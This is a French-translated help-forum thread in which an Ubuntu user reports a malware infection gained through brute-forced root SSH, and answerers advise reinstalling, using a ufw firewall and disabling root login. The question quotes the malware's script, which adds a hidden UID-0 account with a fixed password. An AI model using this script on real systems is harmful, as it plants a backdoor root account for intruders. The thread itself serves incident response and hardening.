web-dev-qa-db-fra.com

Comment traiter les logiciels malveillants sur mon ordinateur portable?

Je suis à peu près certain que mon ordinateur portable Ubuntu 13.10 est infecté par une sorte de malware.

De temps en temps, je trouve un processus/lib/sshd (appartenant à la racine) en cours d'exécution qui consomme beaucoup de ressources processeur. Ce n'est pas le serveur sshd qui exécute/usr/sbin/sshd.

Le binaire a les autorisations --wxrw-rwt et génère et génère des scripts dans le répertoire/lib. Un récent s'appelle 13959730401387633604 et fait ce qui suit

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

L'utilisateur gusr a été créé par le logiciel malveillant indépendamment, puis chpasswd se bloque tout en consommant 100% de l'unité centrale.

Jusqu'ici, j'ai identifié que l'utilisateur gusr avait été ajouté aux fichiers de/etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Il semble que le malware ait copié tous ces fichiers avec le suffixe "-". La liste complète des fichiers/etc/modifiés par root est disponible ici .

De plus, le fichier/etc/hosts a été remplacé par this .

Le répertoire/lib/sshd commence par s’ajouter à la fin du fichier /etc/init.d/rc.local!

J'ai supprimé l'utilisateur, supprimé les fichiers, supprimé l'arborescence des fichiers traités, modifié mes mots de passe et supprimé les clés publiques ssh.

Je suis conscient que je suis fondamentalement foutu, et je vais très probablement réinstaller le système entier. Néanmoins, étant donné que je me connecte à plusieurs autres machines, il serait bon d’essayer au moins de la supprimer et de déterminer comment je l’ai obtenue. Toute suggestion sur la façon de s'y prendre serait appréciée.

On dirait qu'ils sont arrivés le 25 mars en forçant brute le login root. Je ne savais pas que la racine ssh était activée par défaut dans Ubuntu. Je l'ai désactivé et mis en place denyhosts.

La connexion était de 59.188.247.236, quelque part à Hong Kong apparemment.

J'ai reçu l'ordinateur portable d'EmperorLinux et ils ont activé l'accès root. Si vous en avez un et que vous utilisez sshd, méfiez-vous.

12
Dejan Jovanović

Commencez par retirer cette machine du réseau maintenant!

Deuxièmement, pourquoi avez-vous activé le compte root? Vous ne devriez vraiment pas activer le compte root à moins d’avoir une très bonne raison de le faire.

Troisièmement, oui, le seul moyen de vous assurer que vous êtes propre est de procéder à une installation propre. Il est également conseillé de recommencer à zéro et de ne pas revenir à une sauvegarde, car vous ne pouvez jamais savoir quand tout a commencé.

Je vous suggère également de configurer un pare-feu lors de votre prochaine installation et de refuser toutes les connexions entrantes:

Sudo ufw default deny incoming

puis autoriser ssh avec:

Sudo ufw allow ssh

et NE PAS activer le compte root! Certainement assurez-vous que la connexion ssh root est désactivée.

11
Seth